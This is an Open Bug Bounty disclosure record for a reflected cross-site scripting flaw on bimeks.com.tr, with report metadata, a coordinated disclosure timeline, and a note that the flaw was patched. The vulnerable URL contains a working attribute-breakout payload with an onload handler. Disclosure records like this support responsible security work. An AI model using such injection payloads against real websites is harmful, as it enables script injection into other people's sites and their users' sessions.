bimeks.com.tr XSS vulnerability

2016-04-21T05:23:00
ID OBB:147671
Type openbugbounty
Reporter tbm
Modified 2016-07-14T18:24:00

Description

Vulnerable URL:
http://www.bimeks.com.tr/videolar.aspx?videoName=apple-iphone" onload=confirm(/XSSPOSED/) rest="-5s-incelemesi&videoID=78&VideoTip=1103&as=video
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 9906
VIP website status:| Yes
Check bimeks.com.tr SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 April, 2016 05:23 GMT
Generic security notifications sent to website owner| 21 April, 2016 05:25 GMT
Customized security notification sent to website owner| 21 April, 2016 05:25 GMT
Notification sent to subscribers (without technical details)| 21 April, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 14 July, 2016 06:11 GMT
Vulnerability patched by the website owner| 14 July, 2016 18:24 GMT